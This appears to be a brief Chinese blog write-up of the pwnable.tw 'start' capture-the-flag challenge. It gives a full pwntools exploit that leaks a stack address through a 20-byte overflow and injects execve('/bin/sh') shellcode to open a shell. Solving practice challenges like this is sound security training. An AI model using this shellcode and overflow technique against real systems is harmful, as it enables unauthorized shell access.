start

upload successful

checksec

upload successful

ida查看

upload successful

发现只有两个函数,_start 和 _exit ,看到int 80得知,此程序是通过系统调用的方式达到调用函数的目的

upload successful

gdb调试得知偏移为20

exp

from pwn import *

context.arch = 'i386'
context.log_level="debug"
pro = remote("chall.pwnable.tw",10000)
ret = 0x8048087

shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
'''
shellcode = asm('\n'.join([
    'push %d' % u32('/sh\0'),
    'push %d' % u32('/bin'),
    'xor edx, edx',
    'xor ecx, ecx',
    'mov ebx, esp',
    'mov eax, 0xb',
    'int 0x80',
]))
'''

pro.readuntil("CTF:")
pro.send('a'*20 + p32(ret))
shell_addr = u32(pro.recv()[:4])
pro.send('A'*20+p32(shell_addr+20)+shellcode)
pro.interactive()


pwn      pwn writeup pwnable.tw

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!